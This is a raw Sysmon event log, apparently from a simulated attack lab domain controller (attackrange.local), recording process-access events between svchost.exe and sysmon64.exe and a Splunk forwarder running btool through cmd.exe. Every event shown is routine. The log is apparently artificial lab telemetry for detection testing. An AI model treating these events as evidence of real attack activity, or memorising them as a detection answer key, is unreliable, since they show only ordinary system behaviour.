13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8EE0-6005-A500-00000000A301}50363160C:\Windows\system32\cmd.exe{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.831{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.810{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.825{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.794{59A5CD1D-8EE0-6005-A400-00000000A301}29404196C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 